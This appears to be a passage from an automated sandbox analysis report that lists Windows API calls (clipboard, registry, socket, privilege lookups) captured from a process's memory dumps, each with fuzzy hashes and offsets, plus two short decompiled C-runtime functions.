                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026BB5CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 6ac8540efdb6e61cb28e292d417c920650ed7ba788a5994ae88a54736289b97e
                                                                                                              • Instruction ID: 1fce6aec2201209725de72537ea908b4f06cf35a3ca3fc861cd46404c8e876e2
                                                                                                              • Opcode Fuzzy Hash: 6ac8540efdb6e61cb28e292d417c920650ed7ba788a5994ae88a54736289b97e
                                                                                                              • Instruction Fuzzy Hash: FB2181324093809FDB228F65DC44B52FFB4EF06220F0988DEED858F562D375A458CB62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindCloseChangeNotification.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BA6B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591292051-0
                                                                                                              • Opcode ID: 9a60d754889f806f5a43ebdb579f281c3607fe821a1b3d81dc05de0d7b75ec00
                                                                                                              • Instruction ID: 4df532466c590da31788181fea5c37a2f3945718b8a817edbff9481f2d5678a8
                                                                                                              • Opcode Fuzzy Hash: 9a60d754889f806f5a43ebdb579f281c3607fe821a1b3d81dc05de0d7b75ec00
                                                                                                              • Instruction Fuzzy Hash: 6A1190B54093809FD7128F25DC85792BFB4EF06220F0984EBED85CF653D278A848CB61
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • OleGetClipboard.OLE32(?,00000E38,?,?), ref: 026BBF8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard
                                                                                                              • String ID:
                                                                                                              • API String ID: 220874293-0
                                                                                                              • Opcode ID: f862367c68dabdda46a2192f097d641ef413efe75fb4fcf232d53de754c528d3
                                                                                                              • Instruction ID: 7d753e1dd1701e61dbeb030b8a30465e2719f545a64385b6954168ebb72fb730
                                                                                                              • Opcode Fuzzy Hash: f862367c68dabdda46a2192f097d641ef413efe75fb4fcf232d53de754c528d3
                                                                                                              • Instruction Fuzzy Hash: 3F11C4715097806FC321CF16CC45F62FFB4EF8A620F09819AED484B692D224F915CBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: recv
                                                                                                              • String ID:
                                                                                                              • API String ID: 1507349165-0
                                                                                                              • Opcode ID: b441785385732fd6667159952b9be1b386e53eee7b4d019c2c9993a3968a3ddc
                                                                                                              • Instruction ID: 20b19b0d5661dbc741e985be8af1e892e8c86d287328805c1f073b5fe04d30c7
                                                                                                              • Opcode Fuzzy Hash: b441785385732fd6667159952b9be1b386e53eee7b4d019c2c9993a3968a3ddc
                                                                                                              • Instruction Fuzzy Hash: C1119071409380AFDB228F15DC84B52FFB4EF06220F0889EAED858F652D375A458DB62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(?,00000E38), ref: 026BAF67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: 142b46e265012a0250a0aaff8c4d24e4dc7a8fa53437e60b85362d13cd14b0e8
                                                                                                              • Instruction ID: 3ac821da7d7d65f4c1baf81f12233fb020410effd70873c4550d8b7050f59379
                                                                                                              • Opcode Fuzzy Hash: 142b46e265012a0250a0aaff8c4d24e4dc7a8fa53437e60b85362d13cd14b0e8
                                                                                                              • Instruction Fuzzy Hash: AF11E572500300AFE722CF55DD45BA6FBA8DF04720F14845AFD445B286D3B8E944CBB1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000E38,?,?), ref: 026BAEA6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName
                                                                                                              • String ID:
                                                                                                              • API String ID: 514040917-0
                                                                                                              • Opcode ID: 52e750e518d542790b53640e5105d518c84c6c5932a335e5f2625f7fb1c5a3f6
                                                                                                              • Instruction ID: c43410e8d12f9399632ef57336a751b3512b51f62a0565a7a31111f87f5821c2
                                                                                                              • Opcode Fuzzy Hash: 52e750e518d542790b53640e5105d518c84c6c5932a335e5f2625f7fb1c5a3f6
                                                                                                              • Instruction Fuzzy Hash: 89118EB2500605AFD720DF1ADC45F77FBA8EB89B20F14851AED089B640D231F915CAA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FormatMessageW.KERNEL32(?,00000E38,?,?), ref: 026BBBBE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FormatMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 1306739567-0
                                                                                                              • Opcode ID: 4a0c3ab9ee625df6dab00ab6f550f5bdc008f7b6e5f6de598b6d5d33a2683320
                                                                                                              • Instruction ID: 4956208db3804ac18c3b0cb0d67d2dd2612caedbfe48dff7ef26bb9c99adcd8e
                                                                                                              • Opcode Fuzzy Hash: 4a0c3ab9ee625df6dab00ab6f550f5bdc008f7b6e5f6de598b6d5d33a2683320
                                                                                                              • Instruction Fuzzy Hash: 6F118EB2500605AFD720DF1ADC45F77FBA8EB89B20F14851AED089B641D231F915CBA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 026BA806
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3899507212-0
                                                                                                              • Opcode ID: 9a7da2d7debc6f8c30996bd188e58daede1178f98e206797a80f634048a33753
                                                                                                              • Instruction ID: 6e84ef4a464283470e1f13a7ec474330775fd0e1580857481e2e4209d432be8f
                                                                                                              • Opcode Fuzzy Hash: 9a7da2d7debc6f8c30996bd188e58daede1178f98e206797a80f634048a33753
                                                                                                              • Instruction Fuzzy Hash: A51184756043409FDB61CF6AD885796FBE8EF04220F08846AED49CBB45E774E845CBB1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BA620
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 4ab55d6f413ea6288921fd4593736baa7a58daeedfc8c6ada42e4b49a4111b1f
                                                                                                              • Instruction ID: 24fed7b5828ace2d0a80bdb1b56b6a2247f84d4ea4b72d902b0080c0c97239e8
                                                                                                              • Opcode Fuzzy Hash: 4ab55d6f413ea6288921fd4593736baa7a58daeedfc8c6ada42e4b49a4111b1f
                                                                                                              • Instruction Fuzzy Hash: 47118271409380AFD712CF65DC84B52FFB4EF46220F0984DAED858F262D378A948CB62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindNextFileW.KERNEL32(?,00000E38,?,?), ref: 026BA23E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FileFindNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 2029273394-0
                                                                                                              • Opcode ID: bfe499aa4a9b9fba353cca976fea3bb0ae3a14e8402784254246ba0e9ac085b0
                                                                                                              • Instruction ID: f4a1948fe3c068de6f18434f4229a5927f1e6970c299b5db2eb31ff484e04cd0
                                                                                                              • Opcode Fuzzy Hash: bfe499aa4a9b9fba353cca976fea3bb0ae3a14e8402784254246ba0e9ac085b0
                                                                                                              • Instruction Fuzzy Hash: 2C01B171500600ABD710DF1ADC85B26FBA8EB89A20F14816AED089B741E231F915CAA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FormatMessageW.KERNEL32(?,00000E38,?,?), ref: 026BBBBE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FormatMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 1306739567-0
                                                                                                              • Opcode ID: 76869fae6891e1b34c403172fe18eedf409e69fce969fb668a1bf4fddd2f8249
                                                                                                              • Instruction ID: da594362a9732ef2fbd82f203ff413f2ed1aeeafd1ec4dd52641624872490866
                                                                                                              • Opcode Fuzzy Hash: 76869fae6891e1b34c403172fe18eedf409e69fce969fb668a1bf4fddd2f8249
                                                                                                              • Instruction Fuzzy Hash: 8201B171500600ABD310DF1ADC85B26FBA8EB89B20F14812AED089B741E231F915CBE1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000E38,?,?), ref: 026BAEA6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName
                                                                                                              • String ID:
                                                                                                              • API String ID: 514040917-0
                                                                                                              • Opcode ID: 98706bc4884b0b9dc9ffc1992ddc3189ea149971b12bdfd4ec5c01220ce0751e
                                                                                                              • Instruction ID: fc06c626473035fbdaceff229181a2526602005994f30ddad92164cea4620973
                                                                                                              • Opcode Fuzzy Hash: 98706bc4884b0b9dc9ffc1992ddc3189ea149971b12bdfd4ec5c01220ce0751e
                                                                                                              • Instruction Fuzzy Hash: 5501B171500600ABD310DF1ADC85B26FBA8EB89B20F14812AED089B741E231F915CAA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026BB5CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: c8f4df5384636e77c9e3e79fdba0b64446f5fc76ac1a16b2951e888a3b48e04a
                                                                                                              • Instruction ID: a88269f5937fd3b2803540cdb4a1b38341d1755002c4cd2437980741057c5319
                                                                                                              • Opcode Fuzzy Hash: c8f4df5384636e77c9e3e79fdba0b64446f5fc76ac1a16b2951e888a3b48e04a
                                                                                                              • Instruction Fuzzy Hash: 52018032400700DFDB228F56D984B66FFE0EF08320F0888AAED494B615D375E454CF62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • MkParseDisplayName.OLE32(?,00000E38,?,?), ref: 026BB8C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DisplayNameParse
                                                                                                              • String ID:
                                                                                                              • API String ID: 3580041360-0
                                                                                                              • Opcode ID: c1d43533aea50ecd333822d47decb9250081ce04e5c1a977e98e52698a0d5bc7
                                                                                                              • Instruction ID: 250eba546bbeb3798bcd46d2a00c097df738daa4cc39119d08d4f7555bfd05f4
                                                                                                              • Opcode Fuzzy Hash: c1d43533aea50ecd333822d47decb9250081ce04e5c1a977e98e52698a0d5bc7
                                                                                                              • Instruction Fuzzy Hash: 6101A271500601ABD254DF1ADC86B22FBB4FB89B20F14811AED085B741E231F516CBE5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNEL32(?,00000E38,?,?), ref: 026BBE12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: d1e7dc196fabb025af65ed500120fb01f6f6abf54031a806f366886124520d71
                                                                                                              • Instruction ID: 2c4bd9a168dacd52a2d182d62c439f6c5bbd5e9df00105bdd3c48c895c209ab9
                                                                                                              • Opcode Fuzzy Hash: d1e7dc196fabb025af65ed500120fb01f6f6abf54031a806f366886124520d71
                                                                                                              • Instruction Fuzzy Hash: 9101A271500605ABD214DF1ADC86B22FBB4FB89B20F14811AED085B741E371F516CAE5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindCloseChangeNotification.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BAADC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591292051-0
                                                                                                              • Opcode ID: 97a5f1d5ef6e6bf7560efd77ceecee5c72eba8b5f12e270c62a8b1b863392ffd
                                                                                                              • Instruction ID: 5a96ddddd5c851df6581e8e85d53ccf0ef8d92745b6293c19c3c5dbb3a50f9db
                                                                                                              • Opcode Fuzzy Hash: 97a5f1d5ef6e6bf7560efd77ceecee5c72eba8b5f12e270c62a8b1b863392ffd
                                                                                                              • Instruction Fuzzy Hash: 2601DF716003408FDB51CF5AD9847A2FBA4EF04220F08C0AADD498F746E374E888CB72
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • OleGetClipboard.OLE32(?,00000E38,?,?), ref: 026BBF8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard
                                                                                                              • String ID:
                                                                                                              • API String ID: 220874293-0
                                                                                                              • Opcode ID: 7ea18f6faeb63c6c80d016f2cca6fa09dde27699728ab8ae926e5c1bf11e4897
                                                                                                              • Instruction ID: ddc79ca3506611cfa27d81cf572e37fb7c774467006c8769d24f3ecb369855c4
                                                                                                              • Opcode Fuzzy Hash: 7ea18f6faeb63c6c80d016f2cca6fa09dde27699728ab8ae926e5c1bf11e4897
                                                                                                              • Instruction Fuzzy Hash: 8301AD71500601ABD224DF1ADC86B22FBB8FB89B20F14815AED085B741E231F916CAE6
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • FindCloseChangeNotification.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BA6B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                              • String ID:
                                                                                                              • API String ID: 2591292051-0
                                                                                                              • Opcode ID: a55144c1d6974e8eb66571e015705342f669c03a6ce04ae78ab4a136b1c8e0f5
                                                                                                              • Instruction ID: 4a8ff84d6408b1b5bd3f34fc55a6e72213600cd4a906c25910e73b5024173fe9
                                                                                                              • Opcode Fuzzy Hash: a55144c1d6974e8eb66571e015705342f669c03a6ce04ae78ab4a136b1c8e0f5
                                                                                                              • Instruction Fuzzy Hash: 5D0184715043409FDB518F6AD884795FFA4DF04220F18C4AADD498F755E779D844CB61
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: closesocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 2781271927-0
                                                                                                              • Opcode ID: 3cf2324bca9d5bef28e3d455e178430cf438637061d271c1110d5b985eec407c
                                                                                                              • Instruction ID: ccdf4a3b937eefa227942371f4df6d20573f01b12e60dfd870f2a9620ff7172d
                                                                                                              • Opcode Fuzzy Hash: 3cf2324bca9d5bef28e3d455e178430cf438637061d271c1110d5b985eec407c
                                                                                                              • Instruction Fuzzy Hash: 04018B719043409FDB61CF1AD8887A6FBA0EF04224F0884AADD488F646E379A444CBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(?,EECC1F65,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 026BA620
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 28c066374ec1d553a14d4458bca4bf7b866af836242a303792545ec4bcc6928a
                                                                                                              • Instruction ID: b3f0e012d89e1cad7599cc652e03d617170f04f5d74652a97602f13b9e9a2977
                                                                                                              • Opcode Fuzzy Hash: 28c066374ec1d553a14d4458bca4bf7b866af836242a303792545ec4bcc6928a
                                                                                                              • Instruction Fuzzy Hash: 9AF0AF759043409FDB218F56D8887A1FFA0EF04320F18C0AADD494B756E779E988CBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0040D4F4(intOrPtr _a4) {
                                                                                                              				void* _t6;
                                                                                                              
                                                                                                              				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                              				 *0x4234b4 = _t6;
                                                                                                              				if(_t6 != 0) {
                                                                                                              					 *0x4250b0 = 1;
                                                                                                              					return 1;
                                                                                                              				} else {
                                                                                                              					return _t6;
                                                                                                              				}
                                                                                                              			}




                                                                                                              0x0040d509
                                                                                                              0x0040d50f
                                                                                                              0x0040d516
                                                                                                              0x0040d51d
                                                                                                              0x0040d523
                                                                                                              0x0040d519
                                                                                                              0x0040d519
                                                                                                              0x0040d519

                                                                                                              APIs
                                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D509
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: CreateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 10892065-0
                                                                                                              • Opcode ID: b74f0eb7cb2547a527357118f2996512e6bc5046d847e9bf487a9ebd00f7de6a
                                                                                                              • Instruction ID: 0dc2e37081550a42f18de716efddd1270264307755b804b1511d5f7ef129bf73
                                                                                                              • Opcode Fuzzy Hash: b74f0eb7cb2547a527357118f2996512e6bc5046d847e9bf487a9ebd00f7de6a
                                                                                                              • Instruction Fuzzy Hash: 81D05E36A54344AADB115FB07C08B663BDCE388399F404476B90DC6290E678C6418548
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E004104A0() {
                                                                                                              				void* _t1;
                                                                                                              
                                                                                                              				_t1 = E0041042E(0); // executed
                                                                                                              				return _t1;
                                                                                                              			}




                                                                                                              0x004104a2
                                                                                                              0x004104a8

                                                                                                              APIs
                                                                                                              • __encode_pointer.LIBCMT ref: 004104A2
                                                                                                                • Part of subcall function 0041042E: TlsGetValue.KERNEL32(00000000,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410440
                                                                                                                • Part of subcall function 0041042E: TlsGetValue.KERNEL32(00000005,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410457
                                                                                                                • Part of subcall function 0041042E: RtlEncodePointer.NTDLL(00000000,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410495
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: Value$EncodePointer__encode_pointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2585649348-0
                                                                                                              • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                              • Instruction ID: 0ab7d73962414d5186b489697112e47586215f96ab6b5d6f5a678242159ddd99
                                                                                                              • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b4346efb4c691672479a535c9acdb57551ea6cacdb850e35f8bfa0ebc6414a8
                                                                                                              • Instruction ID: 3023a1f12e995ecda301625a1812798cb85f91bc948a628690d93f3ef806db61
                                                                                                              • Opcode Fuzzy Hash: 9b4346efb4c691672479a535c9acdb57551ea6cacdb850e35f8bfa0ebc6414a8
                                                                                                              • Instruction Fuzzy Hash: 8A41F7765093806FD3118F159C45A63FFB8EF86630F08C89FFD899B212D235A905CBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 50446ed7a864c8f797c4de1238c24ba2bde9572d40aed001b31becaddc017e86
                                                                                                              • Instruction ID: f144f43ffc19da7a9cb6e4472edf405c266dd545a8b3b1065051eb2b93e63bd8
                                                                                                              • Opcode Fuzzy Hash: 50446ed7a864c8f797c4de1238c24ba2bde9572d40aed001b31becaddc017e86
                                                                                                              • Instruction Fuzzy Hash: 76216F76544304AFD350CF0AEC41A67FBE8EB88670F18C96EFD4997311E275E5148BA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1d52a1d0bb4904cd501467616bd79d68cb902890023f879366e746bd5e7b2ced
                                                                                                              • Instruction ID: da58134cec15a359a6721a85a9dc195ae955088ff5b08181d88d987e89f0140f
                                                                                                              • Opcode Fuzzy Hash: 1d52a1d0bb4904cd501467616bd79d68cb902890023f879366e746bd5e7b2ced
                                                                                                              • Instruction Fuzzy Hash: 41117376644304BFD6508E0AAC45E62FBA8EB88A70F18C56EFD095B211D276F5148AB1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 648e71d0b4228b23e38a20733f379840ec1fadd25ceb8b052b4612ca91144839
                                                                                                              • Instruction ID: 270b71fa14adebf500306d530d9d521fd682b874cd6db684fa84b9e78a2bcf37
                                                                                                              • Opcode Fuzzy Hash: 648e71d0b4228b23e38a20733f379840ec1fadd25ceb8b052b4612ca91144839
                                                                                                              • Instruction Fuzzy Hash: 91119171549340AFD312CF55DC40A57FFF4EF86660F08889AF8889B312E274A904CB62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 51e31d8d5e61477c4c4063bff3b9175484f1781eb3e03b61827229d8d80c0cd4
                                                                                                              • Instruction ID: 07677c9cc6b2097449af0e2f60305894855c1be0f1cffe56589674f120f71221
                                                                                                              • Opcode Fuzzy Hash: 51e31d8d5e61477c4c4063bff3b9175484f1781eb3e03b61827229d8d80c0cd4
                                                                                                              • Instruction Fuzzy Hash: 4901477240D3C06FD3134B255C55AA2BF78DF03620F0C80CBE9849F163D116A908C7B2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fa758b0c950567af7309e52bbde8f4fc366f6f1d7aac4cf753fc26c7a6a18e1f
                                                                                                              • Instruction ID: 58f31fd75c79ca52be69bbedac9bec99e4d4a8b69b3c2543f2ad28d05d0e2592
                                                                                                              • Opcode Fuzzy Hash: fa758b0c950567af7309e52bbde8f4fc366f6f1d7aac4cf753fc26c7a6a18e1f
                                                                                                              • Instruction Fuzzy Hash: BDE0D872A4130467D2509E069C46B13FF58EB54A70F08C55BFD081B301E5A1F504CAE1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82f8fa9a248ea6601af1285565b02c81ecab6f1a7fdd6bba68ae009953a85931
                                                                                                              • Instruction ID: 48b2201bdd264e86da961cd52063544ff950f400d386b0c7530552b0630190f1
                                                                                                              • Opcode Fuzzy Hash: 82f8fa9a248ea6601af1285565b02c81ecab6f1a7fdd6bba68ae009953a85931
                                                                                                              • Instruction Fuzzy Hash: 86E04872A4130467D2508E069C46B52FF58EB44970F58855AFD095B701E565F50489E5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912471745.00000000026B2000.00000040.00000001.sdmp, Offset: 026B2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d0685beccde864ba957a94c60f4553e3616d82aab6b7e18cc85db33a4e351aa
                                                                                                              • Instruction ID: 3fc3109d3a6484e84a410a0af09e2e13ef2adfe3d23d9b8df48a630fc1fc72e4
                                                                                                              • Opcode Fuzzy Hash: 0d0685beccde864ba957a94c60f4553e3616d82aab6b7e18cc85db33a4e351aa
                                                                                                              • Instruction Fuzzy Hash: 6ED05E79205AA14FD3278A1CC1A8BD53FD4AF51B09F4684FAAC008BB67C368D6D1D300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
